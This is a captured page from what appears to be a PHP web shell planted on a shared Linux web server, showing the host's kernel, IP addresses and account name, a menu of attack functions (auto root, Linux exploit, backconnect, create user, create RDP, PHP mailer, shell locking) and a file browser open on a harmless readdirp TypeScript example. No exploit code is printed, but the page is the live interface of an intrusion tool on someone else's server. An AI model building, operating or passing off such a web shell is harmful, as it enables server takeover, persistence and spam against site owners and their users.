Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-readdirp /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
bench.js
731
B
-rw-r--r--
grep.js
1.46
KB
-rw-r--r--
list.js
733
B
-rw-r--r--
types.ts
578
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : types.ts
import readdirp from 'readdirp'; const read = async (directory: string) => { const stream = readdirp(directory, { type: 'all' }); let i = 0; for await (const chunk of stream) { // Check memory usage with this line. It should be 10MB or so. // Comment it out if you simply want to list files. await new Promise(resolve => setTimeout(resolve, 500)); console.log(`${++i}: ${chunk.path}`); } console.log('Stream done', i); const entries = await readdirp.promise(directory); console.log('Promise done', entries.map(e => e.path)); }; read(__dirname);
Close